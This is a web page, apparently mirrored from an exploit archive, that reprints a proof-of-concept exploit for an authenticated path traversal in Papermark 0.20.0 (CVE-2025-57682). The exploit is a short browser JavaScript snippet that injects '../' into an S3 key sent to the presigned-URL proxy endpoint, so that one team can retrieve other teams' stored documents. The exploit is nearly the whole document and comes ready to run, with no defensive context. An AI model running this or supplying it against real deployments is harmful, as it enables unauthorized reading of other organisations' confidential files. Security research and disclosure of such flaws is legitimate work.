Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

 

 

Papermark 0.20.0 Path Traversal
Papermark 0.20.0 Path Traversal
Papermark 0.20.0 Path Traversal

// Exploit Title: Papermark 0.20.0 - Path Papermark 0.20.0 Path Traversal

// Exploit Title: Papermark 0.20.0 - Path Traversal (Authenticated)
// Date: 2026-01-28
// Exploit Author: Eui Chul Chung
// Vendor Homepage: https://www.papermark.com/
// Software Link: https://github.com/mfts/papermark
// Version: 0.20.0
// CVE Identifier: CVE-2025-57682

(async () => {
const teamId = prompt("Enter team ID");
const docId = prompt("Enter document ID");
const fileName = prompt("Enter file name");

const { id } = await fetch("/api/teams", { method: "GET" })
.then((res) => res.json())
.then((res) => res[0]);

const { url } = await fetch(`/api/file/s3/get-presigned-get-url-proxy`, {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({ key: `${id}/../${teamId}/${docId}/${fileName}` }),
}).then((res) => res.json());

window.location.assign(url);
})();

Social Media Share